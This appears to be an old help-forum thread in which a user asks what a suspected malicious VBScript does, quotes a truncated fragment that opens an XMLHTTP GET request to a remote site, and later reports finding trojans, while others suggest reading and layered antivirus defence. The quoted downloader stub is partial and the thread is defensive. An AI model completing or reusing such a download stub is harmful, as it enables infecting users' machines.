vbscript virus

[FGCS]

Hi.

I encountered what I believe to be a malicious script downloaded to my computer. I believe it is written in vbscript. Is there someone who knows this language who is able to tell me
what it was trying to do? I don't want to post it here for fear of allowing someone else to use it.

Thanks for any help. This stuff is interesting as I am beginning to see how dangerous the internet can become to the unknowing.

Thank you.
FGCS

 

[Dimandja]

>Is there someone who knows this language who is able to tell me what it was trying to do? I don't want to post it here for fear of allowing someone else to use it.

You could at least describe the symptoms, and how you know there is a malicious vbscript on your computer.

If you know it's malicious, then I would assume you would have answered your question.

 

[FGCS]

Hi Dimandja.

I will give part of the text of the script:

TG!  ¶’ò?²Ï?# ª _þX
! Ò­cöëÏ°ã ª ? 

ÿÿÿÿ@  ¾"µÈó\Î­å ª Dw=   †  I  Á<Ž¶ëmÐ?ö ª _þX c €

# m e a n i n g l e s s s h i t i h a d t o p u t h e r e ? ÿ ÿ ÿ h ÿÿÿ#<script language=vbscript> crap = "ÿ!": on error resume next: crap = "ÿ3" : set o = CreateObject("msxml2.XMLHTTP") : crap="ÿB" : o.open "GET","http://

This is half of it. I am just curious as to what is happening .
This file was caught trying to access the internet and stopped by Zonelarm and Norton Anti-virus. I want to know what someone was up to and why?

Thanks for any help.
FGCS

 

[FGCS]

I also found the site this script was calling. It only has one file on it which is another script.

FGCS

 

[Dimandja]

This "set o = CreateObject("msxml2.XMLHTTP")" of course means there is an HTTP protocol being set up. Beyond that, it is almost impossible to tell what the end result of all the activity could be -- especially when another VBScript plays middleman.

A spammer could be trying to squat on your machine, or a foundation could be being built for a virus attack.

Someone else may have a better guess.

 

[CobolKid]

May I suggest that you go to

http://project.honeynet.org/papers/index.html

and read some of the offerings. At the bottom of the page check out "Know Your Enemy - 21 July, 2000," "Know Your Enemy: III - 27 March, 2000," and "Know Your Enemy: A Forensics Analysis - 23 May, 2000."

Dimandia's hit ihe x ring dead center; most likely an invasion of some sorts is underway, the danger is in what you have not discovered. At this point any comments as to whom or why would be nothing more than a guess, however the fact remains that something tried to extablish a socket.

 

[FGCS]

Thanks guys. It turns out I had 6 trojan virus on my computer. On Monday someone used my e-mail address to send out spam. I thought I was safe by virus scanning via a network by mapping the c drive. Is it possible to do a thorough virus scan through a network?

Anyway, I am educating myself.

Thanks again.

 

[dput]

I would recommend that you do a layered approach to virus protection. I run virus protection on each PC in our network, every server in our network, on our mail server checking every incoming mail. I also block most attachment types at our firewall and run antispamming software on our mail server. The layered approach is what is recommended and it will protect everything to a much higher degree than any one solution.

Dan